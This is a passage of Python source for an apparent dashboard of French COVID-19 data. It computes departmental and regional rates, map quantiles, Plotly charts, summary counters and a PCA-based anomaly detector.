quantiles_feature.to_json(orient='index')})\n\n overall_dep_data_as_json_dict.update({'overall_departments_{}'.format(feature)+\"_as_json\": {\"data_\"+feature: data_feature.to_json(orient='index'), \"quantiles_\"+feature: quantiles_feature.to_json(orient='index')}})\n \n elif feature == \"r_dc_rad\":\n ### For rate death case map\n dep_data[feature] = (dep_data['dc'] / (dep_data['dc'] + dep_data['rad']))\n \n data_feature = dep_data.copy()\n\n data_feature = data_feature.set_index(\"department-\" + data_feature.index)\n\n data_feature = data_feature.loc[:, ['label', 'dc', 'rad', feature, 'insee']]\n\n q_feature = np.mean(dep_data[feature].to_numpy() <= (data_feature['dc'].sum() / (data_feature['dc'].sum() + data_feature['rad'].sum())))\n\n q_feature_list = [0.1, 0.1+(q_feature-0.1)/2, q_feature, q_feature+2*(.979-q_feature)/3, .979]\n\n quantiles_feature = data_feature[feature] \\\n .quantile(q_feature_list) \\\n .round(2)\n\n data_feature[feature] = data_feature[feature].round(2)\n\n #setattr(self, 'overall_departments_{}'.format(feature)+\"_as_json\", {\"data_\"+feature: data_feature.to_json(orient='index'), \"quantiles_\"+feature: quantiles_feature.to_json(orient='index')})\n\n overall_dep_data_as_json_dict.update({'overall_departments_{}'.format(feature)+\"_as_json\": {\"data_\"+feature: data_feature.to_json(orient='index'), \"quantiles_\"+feature: quantiles_feature.to_json(orient='index')}})\n\n elif feature == \"hosp\" or feature == \"rea\":\n ### For hosp and or rea case map\n dep_data_j = self.covid[(self.covid['sexe'] == 0) & (self.covid['jour'] == self.last_day)]\n dep_data_j = dep_data_j \\\n .drop(['reg', 'jour', 'sexe'], axis=1) \\\n .groupby('dep') \\\n .max()\n dep_data_j = pd.concat([dep_data_j, self.department_base_data], axis=1)\n\n dep_data_j[feature+'_par_habitants'] = (dep_data_j[feature] / dep_data_j['population']) * 100000\n \n data_feature = dep_data_j.copy()\n \n data_feature = data_feature.set_index(\"department-\" + data_feature.index)\n \n data_feature = data_feature.loc[:, ['label', feature, feature+'_par_habitants', 'insee']]\n\n q_feature = np.mean(data_feature[feature+'_par_habitants'].to_numpy() \\\n <= ((nat_data.at[self.last_day, feature] / self.department_base_data[\"population\"].sum()) * 100000))\n\n q_feature_list = [0.1, 0.1+(q_feature-0.1)/2, q_feature, q_feature+(.949-q_feature)/2, .949]\n\n quantiles_feature = data_feature[feature+'_par_habitants'] \\\n .quantile(q_feature_list) \\\n .round(2)\n\n data_feature[feature+'_par_habitants'] = data_feature[feature+'_par_habitants'].round(2)\n\n #setattr(self, 'overall_departments_{}'.format(feature)+\"_as_json\", {\"data_\"+feature: data_feature.to_json(orient='index'), \"quantiles_\"+feature: quantiles_feature.to_json(orient='index')})\n\n overall_dep_data_as_json_dict.update({'overall_departments_{}'.format(feature)+\"_as_json\": {\"data_\"+feature: data_feature.to_json(orient='index'), \"quantiles_\"+feature: quantiles_feature.to_json(orient='index')}})\n\n return overall_dep_data_as_json_dict\n\n def charts_impacted_dep(self, top_number=None): \n if top_number is None:\n top_number = self.default_top_dep\n ratedf = self.covid[(self.covid.sexe == 0) & (self.covid.jour == self.last_day)].groupby(['dep']).sum().copy()\n ratedf = ratedf.drop(['sexe',], axis=1)\n ratedf = (ratedf[['hosp', 'rea', 'rad', 'dc']].div(self.department_base_data['population'], axis=0) * 100000).round(2)\n ratedf = pd.concat([ratedf, self.department_base_data], axis=1)\n ratedf.sort_values(by=['hosp'], inplace=True, 
ascending=False)\n\n dep_data_norm = {department: ((self.covid[(self.covid.dep == department) & (self.covid.sexe == 0)].groupby(['jour']).sum() / self.department_base_data.at[department, 'population']) * 100000).round(2) for department in self.department_base_data.insee}\n dep_data_norm_col = CovidFr.normrate(ddn=dep_data_norm, cdu=list(self.covid.dep.unique()), featurelist = ['hosp', 'rea', 'rad', 'dc'])\n\n tddv_hosp = CovidFr.topdepdataviz(data=dep_data_norm_col[\"hosp\"], top=True, top_number=top_number, threshold=65)\n tddv_rea = CovidFr.topdepdataviz(data=dep_data_norm_col[\"rea\"], top=True, top_number=top_number, threshold=65)\n\n # start of integration of the positive cases\n pratedf = self.dprate[(self.dprate.cl_age90 == 0) & (self.dprate.jour == self.positive_last_day)].groupby(['dep']).sum().copy()\n pratedf = pratedf.drop(['cl_age90'], axis=1)\n pratedf = (pratedf[['P']].div(self.department_base_data['population'], axis=0) * 100000).round(2)\n pratedf = pd.concat([pratedf, self.department_base_data], axis=1)\n\n dep_positive_norm = {department: ((self.dprate[(self.dprate.dep == department) & (self.dprate.cl_age90 == 0)].groupby(['jour']).sum() / self.department_base_data.at[department, 'population']) * 100000).round(2) for department in self.department_base_data.insee}\n dep_positive_norm_col = CovidFr.normrate(ddn=dep_positive_norm, cdu=list(self.dprate.dep.unique()), featurelist = ['P'])\n\n tddv_positive = CovidFr.topdepdataviz(data=dep_positive_norm_col[\"P\"], top=True, top_number=top_number, threshold=65)\n # end integration of the positive cases\n\n graphs = [\n dict(\n id = \"Dernier nombre de patients pour 100 000 habitants par département\",\n data = [\n CovidFr.dataviz(x=ratedf.label, y=ratedf['hosp'], curve_type='bar', color='#ff7f00', width=1.5, name=\"Nbre d'hospitalisations\", opacity=0.9, text = [i for i in ratedf.index], hovertemplate = '%{y:.2f} hospitalisations
dépt. %{x} (FR-%{text})'), \n\n CovidFr.dataviz(x=ratedf.label, y=ratedf['dc'], curve_type='bar', color='#730800', width=1.5, name=\"Nbre de décès\", opacity=0.9, text = [i for i in ratedf.index], hovertemplate = '%{y:.2f} décès
dépt. %{x} (FR-%{text})'), \n\n CovidFr.dataviz(x=ratedf.label, y=ratedf['rea'], curve_type='bar', color='#ff0000', width=1.5, name=\"Nbre de réanimations\", opacity=0.9, text = [i for i in ratedf.index], hovertemplate = '%{y:.2f} réanimations
dépt. %{x} (FR-%{text})'),\n\n CovidFr.dataviz(x=pratedf.label, y=pratedf['P'], curve_type='bar', color='#f84ed3', width=1.5, name=\"Nbre de cas positifs\", opacity=0.9, text = [i for i in pratedf.index], hovertemplate = '%{y:.2f} cas positifs
dépt. %{x} (FR-%{text})'),\n ],\n layout = CovidFr.layoutoption(margin=dict(l=30, r=10, b=30, t=30), barmode='group', linemode='overlay', legend_orientation=\"h\"),\n ),\n\n dict(\n id = \"Top des départements selon le nombre d'hospitalisations pour 100 000 habitants\",\n data = [CovidFr.dataviz(x=tddv_hosp.index, y=tddv_hosp[dep], curve_type='Scatter', name=self.department_base_data.at[dep, \"label\"], text=[self.department_base_data.at[dep, \"label\"]+\" (FR-\"+dep+\")\"]*len(tddv_hosp.index), hovertemplate='%{y:.2f} '+'hospitalisations'+'
'+'dépt. %{text}') for dep in list(tddv_hosp.columns.unique())],\n layout = CovidFr.layoutoption(margin=dict(l=30, r=10, b=30, t=30), linemode='overlay', legend_orientation=\"h\"),\n ),\n\n dict(\n id = \"Top des départements selon le nombre de réanimations pour 100 000 habitants\",\n data = [CovidFr.dataviz(x=tddv_rea.index, y=tddv_rea[dep], curve_type='Scatter', name=self.department_base_data.at[dep, \"label\"], text=[self.department_base_data.at[dep, \"label\"]+\" (FR-\"+dep+\")\"]*len(tddv_rea.index), hovertemplate='%{y:.2f} '+'réanimations'+'
'+'dépt. %{text}') for dep in list(tddv_rea.columns.unique())],\n layout = CovidFr.layoutoption(margin=dict(l=30, r=10, b=30, t=30), linemode='overlay', legend_orientation=\"h\"),\n ),\n\n dict(\n id = \"Top des départements selon le nombre de cas positifs pour 100 000 habitants\",\n data = [CovidFr.dataviz(x=tddv_positive.index, y=tddv_positive[dep], curve_type='Scatter', name=self.department_base_data.at[dep, \"label\"], text=[self.department_base_data.at[dep, \"label\"]+\" (FR-\"+dep+\")\"]*len(tddv_positive.index), hovertemplate='%{y:.2f} '+'cas positifs'+'
'+'dépt. %{text}') for dep in list(tddv_positive.columns.unique())],\n layout = CovidFr.layoutoption(margin=dict(l=30, r=10, b=30, t=30), linemode='overlay', legend_orientation=\"h\"),\n ),\n ]\n #############################################################\n gJ = {}\n for g in range(len(graphs)):\n gJ.update({'graphJSON{}'.format(g): json.dumps([graphs[g]], cls=plotly.utils.PlotlyJSONEncoder)})\n #############################################################\n return gJ\n\n def charts_and_parameters_covid_data(self, data=None, department=None, region=None): \n if region is None and department is None:\n if data is None:\n cdata = self.covid[self.covid.sexe == 0].groupby(['jour']).sum().copy()\n cdata = CovidFr.dailycases(data=cdata, pca=False)\n cpop = self.department_base_data[\"population\"].sum()\n else: \n cdata = data[data.sexe == 0].groupby(['jour']).sum().copy()\n cdata = CovidFr.dailycases(data=cdata, pca=False)\n cpop = self.department_base_data[\"population\"].sum()\n elif region is None and not department is None:\n if data is None:\n cdata = self.covid[(self.covid.dep == department) & (self.covid.sexe == 0)].groupby(['jour']).sum().copy()\n cdata = CovidFr.dailycases(data=cdata, pca=False)\n cpop = self.department_base_data.at[department, 'population']\n else: \n cdata = data[(data.dep == department) & (data.sexe == 0)].groupby(['jour']).sum().copy()\n cdata = CovidFr.dailycases(data=cdata, pca=False)\n cpop = self.department_base_data.at[department, 'population']\n elif not region is None and department is None:\n if data is None:\n # regdep = []\n # for d in self.covid[self.covid.reg==region].dep.unique():\n # regdep.append(CovidFr.dailycases(data=self.covid[(self.covid.dep == d) & (self.covid.sexe == 0)].groupby(['jour']).sum(), pca=False))\n # cdata = reduce(lambda x, y: x.add(y, fill_value=0), regdep)\n cdata = self.covid[(self.covid.reg == region) & (self.covid.sexe == 0)].groupby(['jour']).sum().copy()\n cdata = CovidFr.dailycases(data=cdata, pca=False)\n cpop = self.region_base_data.at[region, 'population']\n else: \n # regdep = []\n # for d in data[data.reg==region].dep.unique():\n # regdep.append(CovidFr.dailycases(data=data[(data.dep == d) & (data.sexe == 0)].groupby(['jour']).sum(), pca=False))\n # cdata = reduce(lambda x, y: x.add(y, fill_value=0), regdep)\n cdata = data[(data.reg == region) & (data.sexe == 0)].groupby(['jour']).sum().copy()\n cdata = CovidFr.dailycases(data=cdata, pca=False)\n cpop = self.region_base_data.at[region, 'population']\n\n graphs = [\n dict(\n id = \"Nombre de personnes actuellement hospitalisées\",\n data = [CovidFr.dataviz(x=cdata.index, y=cdata['hosp'], curve_type='line', color='#ff7f00', width=3)],\n layout = CovidFr.layoutoption(margin=dict(l=30, r=30, b=30, t=30)),\n ), \n\n dict(\n id = \"Nombre de personnes actuellement en réanimation\",\n data = [CovidFr.dataviz(x=cdata.index, y=cdata['rea'], curve_type='line', color='#ff0000', width=3)],\n layout = CovidFr.layoutoption(margin=dict(l=30, r=30, b=30, t=30)),\n ), \n\n dict(\n id = \"Nombre cumulé de personnes décédées à l'hôpital\",\n data = [CovidFr.dataviz(x=cdata.index, y=cdata['dc_rectif'], curve_type='line', color='#730800', width=3)],\n layout = CovidFr.layoutoption(margin=dict(l=30, r=30, b=30, t=30)),\n ),\n\n dict(\n id = \"Nombre cumulé de personnes retournées à domicile\",\n data = [CovidFr.dataviz(x=cdata.index, y=cdata['rad_rectif'], curve_type='line', color='#57d53b', width=3)],\n layout = CovidFr.layoutoption(margin=dict(l=30, r=30, b=30, t=30)),\n ),\n\n dict(\n 
id = \"Nombre quotidien de personnes décédées à l'hôpital\",\n data = [CovidFr.dataviz(x=cdata.index, y=cdata['dc_j'], curve_type='bar', color='#730800', width=1)],\n layout = CovidFr.layoutoption(margin=dict(l=30, r=15, b=30, t=30), barmode='overlay',linemode='overlay', legend_orientation=\"h\"),\n ),\n\n dict(\n id = \"Nombre quotidien de personnes retournées à domicile\",\n data = [CovidFr.dataviz(x=cdata.index, y=cdata['rad_j'], curve_type='bar', color='#57d53b', width=1, opacity=0.8)],\n layout = CovidFr.layoutoption(margin=dict(l=30, r=15, b=30, t=30), barmode='overlay',linemode='overlay', legend_orientation=\"h\"),\n ),\n ]\n #############################################################\n gJ = {}\n for g in range(len(graphs)):\n gJ.update({'graphJSON{}'.format(g): json.dumps([graphs[g]], cls=plotly.utils.PlotlyJSONEncoder)})\n #############################################################\n\n fdata = self.covid[self.covid.sexe == 0].groupby(['jour']).sum().copy()\n popfr = self.department_base_data[\"population\"].sum()\n\n before_last_day = cdata.index[-2].strftime(\"%Y-%m-%d\")\n\n counters = {\n \"last_update_fr\": datetime.strptime(self.last_update, \"%Y-%m-%dT%H:%M:%S.%f\").strftime(\"%d/%m/%Y à %Hh%M\"),\n \n \"last_dc\": cdata.at[self.last_day, 'dc_j'],\n \"diff_dc\": cdata.at[self.last_day, 'dc_j'] - cdata.at[before_last_day, 'dc_j'],\n \"all_dc\": cdata.at[self.last_day, 'dc_rectif'],\n \"last_rad\": cdata.at[self.last_day, 'rad_j'],\n \"diff_rad\": cdata.at[self.last_day, 'rad_j'] - cdata.at[before_last_day, 'rad_j'],\n \"all_rad\": cdata.at[self.last_day, 'rad_rectif'], \n \"current_hosp\": cdata.at[self.last_day, 'hosp'],\n \"diff_hosp\": cdata.at[self.last_day, 'hosp'] - cdata.at[before_last_day, 'hosp'],\n \"current_rea\": cdata.at[self.last_day, 'rea'], \n \"diff_rea\": cdata.at[self.last_day, 'rea'] - cdata.at[before_last_day, 'rea'],\n\n \"rates\": {\n \"dc\": ((cdata.at[self.last_day, 'dc_rectif'] / cpop) * 100000).round(2),\n \"d_dc\": (((cdata.at[self.last_day, 'dc_rectif'] - cdata.at[before_last_day, 'dc_rectif']) / cpop) * 100000).round(2),\n \"rea\": ((cdata.at[self.last_day, 'rea'] / cpop) * 100000).round(2),\n \"d_rea\": (((cdata.at[self.last_day, 'rea'] - cdata.at[before_last_day, 'rea']) / cpop) * 100000).round(2),\n \"hosp\": ((cdata.at[self.last_day, 'hosp'] / cpop) * 100000).round(2),\n \"d_hosp\": (((cdata.at[self.last_day, 'hosp'] - cdata.at[before_last_day, 'hosp']) / cpop) * 100000).round(2),\n \"rad\": ((cdata.at[self.last_day, 'rad_rectif'] / cpop) * 100000).round(2),\n \"d_rad\": (((cdata.at[self.last_day, 'rad_rectif'] - cdata.at[before_last_day, 'rad_rectif']) / cpop) * 100000).round(2),\n \"r_dc_rad\": ((cdata.at[self.last_day, 'dc_rectif'] / (cdata.at[self.last_day, 'dc_rectif'] + cdata.at[self.last_day, 'rad_rectif']))*100).round(2),\n \"d_r_dc_rad\": ((cdata.at[self.last_day, 'dc_rectif'] / (cdata.at[self.last_day, 'dc_rectif'] + cdata.at[self.last_day, 'rad_rectif']))*100 - (cdata.at[before_last_day, 'dc_rectif'] / (cdata.at[before_last_day, 'dc_rectif'] + cdata.at[before_last_day, 'rad_rectif']))*100).round(2),\n },\n \n \"nat_refs\": {\n \"nat_dc\": ((fdata.at[self.last_day, 'dc'] / popfr) * 100000).round(2),\n \"nat_r_dc_rad\": (fdata.at[self.last_day, 'dc'] / (fdata.at[self.last_day, 'dc'] + fdata.at[self.last_day, 'rad'])).round(2),\n \"nat_rad\": ((fdata.at[self.last_day, 'rad'] / popfr) * 100000).round(2),\n \"nat_hosp\": ((fdata.at[self.last_day, 'hosp'] / popfr) * 100000).round(2),\n \"nat_rea\": ((fdata.at[self.last_day, 'rea'] / 
popfr) * 100000).round(2),\n },\n }\n gJ.update({'counters': counters})\n\n return gJ\n\n ##############################\n # positive case study starting\n ##############################\n def map_positive_reg(self, data=None):\n \"\"\"\n Get data from regions as a JSON string along with quantiles\n Returns:\n JSON string of regions overall data\n \"\"\"\n if data is None:\n reg_data = self.rprate[(self.rprate['cl_age90'] == 0)].copy()\n else:\n reg_data = data[(data['cl_age90'] == 0)]\n\n overall_reg_data_as_json_dict = {}\n\n for feature in [\"P\"]:\n ### For positive case map\n reg_data_j = self.rprate[(self.rprate['cl_age90'] == 0) & (self.rprate['jour'] == self.positive_last_day)]\n reg_data_j = reg_data_j.drop([\"jour\", \"cl_age90\"], axis=1).groupby('reg').max()\n reg_data_j = pd.concat([reg_data_j, self.region_base_data], axis=1)\n\n reg_data_j[feature+'_par_habitants'] = (reg_data_j[feature] / reg_data_j['population']) * 100000\n\n data_feature = reg_data_j.copy()\n\n data_feature = data_feature.set_index(\"region-\" + data_feature.index)\n\n data_feature = data_feature.loc[:, ['label', feature, feature+'_par_habitants', 'insee']]\n\n nat = (reg_data.groupby(\"jour\").sum().at[self.positive_last_day, feature] / self.region_base_data[\"population\"].sum()) * 100000\n\n # share of regions at or below the national rate; anchors the colour scale on the national level\n q_feature = np.mean(data_feature[feature+'_par_habitants'].to_numpy() <= nat)\n\n q_feature_list = [0.1, 0.1+(q_feature-0.1)/2, q_feature, q_feature+(.949-q_feature)/2, .949]\n\n quantiles_feature = data_feature[feature+'_par_habitants'] \\\n .quantile(q_feature_list) \\\n .round(2)\n\n data_feature[feature+'_par_habitants'] = data_feature[feature+'_par_habitants'].round(2)\n\n overall_reg_data_as_json_dict.update({'overall_regions_{}'.format(feature)+\"_as_json\": {\"data_\"+feature: data_feature.to_json(orient='index'), \"quantiles_\"+feature: quantiles_feature.to_json(orient='index')}})\n\n return overall_reg_data_as_json_dict\n\n def map_positive_dep(self, data=None):\n \"\"\"\n Get data from departments as a JSON string along with quantiles\n Returns:\n JSON string of departments overall data\n \"\"\"\n if data is None:\n dep_data = self.dprate[(self.dprate['cl_age90'] == 0)].copy()\n else:\n dep_data = data[(data['cl_age90'] == 0)]\n\n overall_dep_data_as_json_dict = {}\n\n for feature in [\"P\"]:\n ### For positive case map\n dep_data_j = self.dprate[(self.dprate['cl_age90'] == 0) & (self.dprate['jour'] == self.positive_last_day)]\n dep_data_j = dep_data_j.drop([\"jour\", \"cl_age90\"], axis=1).groupby('dep').max()\n dep_data_j = pd.concat([dep_data_j, self.department_base_data], axis=1)\n\n dep_data_j[feature+'_par_habitants'] = (dep_data_j[feature] / dep_data_j['population']) * 100000\n\n data_feature = dep_data_j.copy()\n\n data_feature = data_feature.set_index(\"department-\" + data_feature.index)\n\n data_feature = data_feature.loc[:, ['label', feature, feature+'_par_habitants', 'insee']]\n\n nat = (dep_data.groupby(\"jour\").sum().at[self.positive_last_day, feature] / self.department_base_data[\"population\"].sum()) * 100000\n\n q_feature = np.mean(data_feature[feature+'_par_habitants'].to_numpy() <= nat)\n\n q_feature_list = [0.1, 0.1+(q_feature-0.1)/2, q_feature, q_feature+(.949-q_feature)/2, .949]\n\n quantiles_feature = data_feature[feature+'_par_habitants'] \\\n .quantile(q_feature_list) \\\n 
.round(2)\n\n data_feature[feature+'_par_habitants'] = data_feature[feature+'_par_habitants'].round(2)\n\n overall_dep_data_as_json_dict.update({'overall_departments_{}'.format(feature)+\"_as_json\": {\"data_\"+feature: data_feature.to_json(orient='index'), \"quantiles_\"+feature: quantiles_feature.to_json(orient='index')}})\n\n return overall_dep_data_as_json_dict\n\n def charts_and_parameters_positive_data(self, data=None, department=None, region=None):\n # positive-test series live in three frames: national (nprate), departmental (dprate) and regional (rprate)\n if region is None and department is None:\n src = self.nprate if data is None else data\n cdata = src[src.cl_age90 == 0].groupby(['jour']).sum().copy()\n cpop = self.department_base_data[\"population\"].sum()\n elif region is None and department is not None:\n src = self.dprate if data is None else data\n cdata = src[(src.dep == department) & (src.cl_age90 == 0)].groupby(['jour']).sum().copy()\n cpop = self.department_base_data.at[department, 'population']\n elif region is not None and department is None:\n src = self.rprate if data is None else data\n cdata = src[(src.reg == region) & (src.cl_age90 == 0)].groupby(['jour']).sum().copy()\n cpop = self.region_base_data.at[region, 'population']\n else:\n raise ValueError(\"pass either a department or a region, not both\")\n\n graphs = [\n dict(\n id = \"Nombre de personnes actuellement positives\",\n data = [CovidFr.dataviz(x=cdata.index, y=cdata['P'], curve_type='bar', color='#f84ed3', width=1, opacity=0.8)],\n layout = CovidFr.layoutoption(margin=dict(l=30, r=15, b=30, t=30), barmode='overlay', linemode='overlay', legend_orientation=\"h\"),\n ),\n ]\n #############################################################\n gJ = {}\n for g in range(len(graphs)):\n gJ.update({'graphJSON{}'.format(g): json.dumps([graphs[g]], cls=plotly.utils.PlotlyJSONEncoder)})\n #############################################################\n\n fdata = self.nprate[self.nprate.cl_age90 == 0].groupby(['jour']).sum().copy()\n popfr = self.department_base_data[\"population\"].sum()\n\n before_last_day = cdata.index[-2].strftime(\"%Y-%m-%d\")\n\n counters = {\n \"positive_last_day_fr\": self.positive_last_day_fr,\n \"positive_last_update_fr\": datetime.strptime(self.positive_last_update, \"%Y-%m-%dT%H:%M:%S.%f\").strftime(\"%d/%m/%Y à %Hh%M\"),\n\n \"current_positive\": cdata.at[self.positive_last_day, 'P'],\n \"diff_positive\": cdata.at[self.positive_last_day, 'P'] - cdata.at[before_last_day, 'P'],\n\n \"rates\": {\n \"positive\": ((cdata.at[self.positive_last_day, 'P'] / cpop) * 100000).round(2),\n \"d_positive\": (((cdata.at[self.positive_last_day, 'P'] - cdata.at[before_last_day, 'P']) / cpop) * 100000).round(2),\n },\n\n \"nat_refs\": {\n \"nat_positive\": ((fdata.at[self.positive_last_day, 'P'] / popfr) * 100000).round(2),\n },\n }\n\n gJ.update({'counters': counters})\n\n return gJ\n ##############################\n # positive case study ending\n ##############################\n\n def request_label(self, department=None, region=None):\n \"\"\"Get a department 
or a region label from its insee code\n Returns:\n Department or Region label\n \"\"\"\n if department is not None and region is None:\n if department in self.department_base_data.index:\n return {\"prefix\": \"dépt.\", \"type\": \"department\", \"name\": self.department_base_data.at[department, 'label']}\n return \"\"\n elif department is None and region is not None:\n if region in self.region_base_data.index:\n return {\"prefix\": \"région\", \"type\": \"region\", \"name\": self.region_base_data.at[region, 'label']}\n return \"\"\n return \"France\"\n\n def pca_charts(self, data, pcdim, q=0.975, normalize=False, start_d_learn='15/05/2020', end_d_learn='20/08/2020', alpha=1-0.4):\n\n results = CovidFr.pca(data, pcdim, q, normalize, start_d_learn, end_d_learn, alpha)\n\n annotations = [\n go.layout.Annotation(\n #x = max(results[\"Hotelling\"][\"dataindex\"])-(max(results[\"Hotelling\"][\"dataindex\"])-min(results[\"Hotelling\"][\"dataindex\"]))/4,\n x = results[\"Hotelling\"][\"dataindex\"][-30],\n y = 3*max(results[\"Hotelling\"][\"t2\"])/4,\n xref = \"x\",\n yref = \"y\",\n text = 'rpc: {} pc (ev: {}%)
normalized data: {}
model building: {}
to {}
smoothing filter: {}'.format(pcdim, ((np.trace(np.diag(results[\"eigenvalues\"][:pcdim]))/np.trace(np.diag(results[\"eigenvalues\"])))*100).round(2), normalize, start_d_learn, end_d_learn, alpha),\n showarrow = False,\n font = dict(\n family = \"Courier New, monospace\",\n size = 10,\n color = \"#ffffff\",\n ),\n align = \"left\",\n arrowhead = 2,\n arrowsize = 1,\n arrowwidth = 2,\n arrowcolor = \"#636363\",\n ax = 20,\n ay = 30,\n bordercolor = \"#c7c7c7\",\n borderwidth = 2,\n borderpad = 4,\n bgcolor = '#000080',\n opacity = 0.3,\n )\n ]\n\n graphs = [\n dict(\n id = 'Hotelling',\n data=[\n CovidFr.dataviz(x=results[\"Hotelling\"][\"dataindex\"], y=results[\"Hotelling\"][\"t2\"], curve_type='line', color='#02056D', name='score t', width=3, text=['situation anormale' if results[\"Hotelling\"][\"t2\"][i]>results[\"Hotelling\"][\"threshold\"] else 'situation normale' for i in range(len(results[\"Hotelling\"][\"dataindex\"]))], hovertemplate='%{text}'),\n\n CovidFr.dataviz(x=results[\"Hotelling\"][\"dataindex\"], y=results[\"Hotelling\"][\"smoothed_t2\"], curve_type='line', color='#026D2F', name='score t filtré', width=3, text=['situation anormale' if results[\"Hotelling\"][\"smoothed_t2\"][i]>results[\"Hotelling\"][\"threshold\"] else 'situation normale' for i in range(len(results[\"Hotelling\"][\"dataindex\"]))], hovertemplate='%{text}'),\n\n CovidFr.dataviz(x=results[\"Hotelling\"][\"dataindex\"], y=np.repeat(results[\"Hotelling\"][\"threshold\"], results[\"Hotelling\"][\"t2\"].shape[0]), curve_type='line', color='#ff0000', name='seuil', width=3, text=['seuil' for i in range(len(results[\"Hotelling\"][\"dataindex\"]))], hovertemplate='%{text}', showlegend = False),\n ],\n layout = CovidFr.layoutoption(margin=dict(l=30, r=30, b=30, t=30), linemode='overlay', legend=dict(orientation=\"h\"), annotations=annotations),\n ),\n\n dict(\n id = 'SPE',\n data=[\n CovidFr.dataviz(x=results[\"SPE\"][\"dataindex\"], y=results[\"SPE\"][\"spe\"], curve_type='line', color='#02056D', name='score s', width=3, text=['situation anormale' if results[\"SPE\"][\"spe\"][i]>results[\"SPE\"][\"threshold\"] else 'situation normale' for i in range(len(results[\"SPE\"][\"dataindex\"]))], hovertemplate='%{text}'),\n\n CovidFr.dataviz(x=results[\"SPE\"][\"dataindex\"], y=results[\"SPE\"][\"smoothed_spe\"], curve_type='line', color='#026D2F', name='score s filtré', width=3, text=['situation anormale' if results[\"SPE\"][\"smoothed_spe\"][i]>results[\"SPE\"][\"threshold\"] else 'situation normale' for i in range(len(results[\"SPE\"][\"dataindex\"]))], hovertemplate='%{text}'),\n\n CovidFr.dataviz(x=results[\"SPE\"][\"dataindex\"], y=np.repeat(results[\"SPE\"][\"threshold\"], results[\"SPE\"][\"spe\"].shape[0]), curve_type='line', color='#ff0000', name='seuil', width=3, text=['seuil' for i in range(len(results[\"SPE\"][\"dataindex\"]))], hovertemplate='%{text}', showlegend = False),\n ],\n layout = CovidFr.layoutoption(margin=dict(l=30, r=30, b=30, t=30), linemode='overlay', legend=dict(orientation=\"h\")),\n ),\n ]\n\n graphJSON = json.dumps(graphs, cls=plotly.utils.PlotlyJSONEncoder)\n\n return {'graphJSON': graphJSON,\n 'retained PCs': pcdim,\n 'normalized': normalize,\n 'explained variance': ((np.trace(np.diag(results[\"eigenvalues\"][:pcdim]))/np.trace(np.diag(results[\"eigenvalues\"])))*100).round(2),\n 'SPE': {'spe': results[\"SPE\"][\"spe\"],\n 'smoothed_spe': results[\"SPE\"][\"smoothed_spe\"],\n 'threshold': results[\"SPE\"][\"threshold\"],\n },\n 'Hotelling': {'t2': results[\"Hotelling\"][\"t2\"], \n 
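# smoothed_t2 is the EWMA-filtered copy of the raw T2 scores (see ewma_filter below)\n 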
'smoothed_t2': results[\"Hotelling\"][\"smoothed_t2\"], \n 'threshold': results[\"Hotelling\"][\"threshold\"],\n },\n }\n\n @staticmethod\n def normrate(ddn, cdu, featurelist):\n dep_data_norm_col = {}\n for col in featurelist:\n data = []\n for dep in cdu:\n data.append(ddn[dep][col])\n dep_data_norm_col.update({col: pd.concat(data, axis=1, keys=cdu)})\n return dep_data_norm_col\n\n @staticmethod\n def regionadd(data):\n regions = {\n \"01\": {\"Guadeloupe\": ['971']},\n \"02\": {\"Martinique\": ['972']},\n \"03\": {\"Guyane\": ['973']},\n \"04\": {\"La Réunion\": ['974']},\n \"06\": {\"Mayotte\": ['976']},\n \"11\": {\"Île-de-France\": ['92', '93', '94', '78', '75', '77', '91', '95']},\n \"24\": {\"Centre-Val de Loire\": ['41', '28', '45', '18', '37', '36']},\n \"27\": {\"Bourgogne-Franche-Comté\": ['71', '58', '25', '70', '90', '39', '89', '21']},\n \"28\": {\"Normandie\": ['76', '61', '50', '14', '27']},\n \"32\": {\"Hauts-de-France\": ['60', '59', '02', '62', '80']},\n \"44\": {\"Grand Est\": ['54', '68', '51', '55', '08', '57', '67', '52', '88', '10']},\n \"52\": {\"Pays de la Loire\": ['49', '85', '44', '72', '53']},\n \"53\": {\"Bretagne\": ['29', '56', '35', '22']},\n \"75\": {\"Nouvelle-Aquitaine\": ['24', '17', '33', '64', '16', '40', '19', '79', '87', '86', '47', '23']},\n \"76\": {\"Occitanie\": ['34', '48', '46', '82', '11', '12', '32', '09', '81', '65', '30', '66', '31']}, \n \"84\": {\"Auvergne-Rhône-Alpes\": ['38', '01', '42', '74', '73', '43', '03', '26', '69', '07', '63', '15']},\n \"93\": {\"Provence-Alpes-Côte d'Azur\": ['13', '05', '06', '84', '04', '83']},\n \"94\": {\"Corse\": ['2B', '2A']},\n }\n for key, value in regions.items():\n for k, v in value.items():\n data.loc[data.loc[data['dep'].isin(v)].index, 'reg'] = key\n data = data[[\"reg\", \"dep\", \"sexe\", \"jour\", \"hosp\", \"rea\", \"rad\", \"dc\"]]\n return data\n \n @staticmethod\n def dailycases(data=None, pca=False):\n cdata = data[data.sexe == 0].groupby(['jour']).sum().copy()\n cdata = cdata[['hosp', 'rea', 'rad', 'dc']]\n\n cdata.index = pd.to_datetime(cdata.index)\n\n dc_j = []\n rad_j = []\n dc_rectif = []\n rad_rectif = []\n for i in range(len(cdata.index)):\n dc_rectif.append(max(cdata.dc[0:i+1]))\n rad_rectif.append(max(cdata.rad[0:i+1]))\n if i == 0:\n dc_j.append(cdata.dc[i])\n rad_j.append(cdata.rad[i]) \n else: \n dc_j.append(max(cdata.dc[0:i+1]) - max(cdata.dc[0:i]))\n rad_j.append(max(cdata.rad[0:i+1]) - max(cdata.rad[0:i]))\n\n cdata[\"rad_rectif\"] = rad_rectif\n cdata[\"dc_rectif\"] = dc_rectif\n cdata[\"rad_j\"] = rad_j\n cdata[\"dc_j\"] = dc_j\n\n if pca is True:\n cdata = cdata[['hosp', 'rea', 'rad_j', 'dc_j']]\n cdata = cdata.rename(columns={'rad_j':'rad', 'dc_j':'dc'})\n return cdata\n return cdata\n\n @staticmethod\n def ewma_filter(data, alpha, offset=None, dtype=None, order='C', out=None):\n \"\"\"\n Calculates the exponential moving average over a vector.\n Will fail for large inputs.\n \"\"\"\n data = np.array(data, copy=False)\n\n if dtype is None:\n if data.dtype == np.float32:\n dtype = np.float32\n else:\n dtype = np.float64\n else:\n dtype = np.dtype(dtype)\n\n if data.ndim > 1:\n # flatten input\n data = data.reshape(-1, order)\n\n if out is None:\n out = np.empty_like(data, dtype=dtype)\n else:\n assert out.shape == data.shape\n assert out.dtype == dtype\n\n if data.size < 1:\n # empty input, return empty array\n return out\n\n if offset is None:\n offset = data[0]\n\n alpha = np.array(alpha, copy=False).astype(dtype, copy=False)\n # scaling_factors -> 0 as 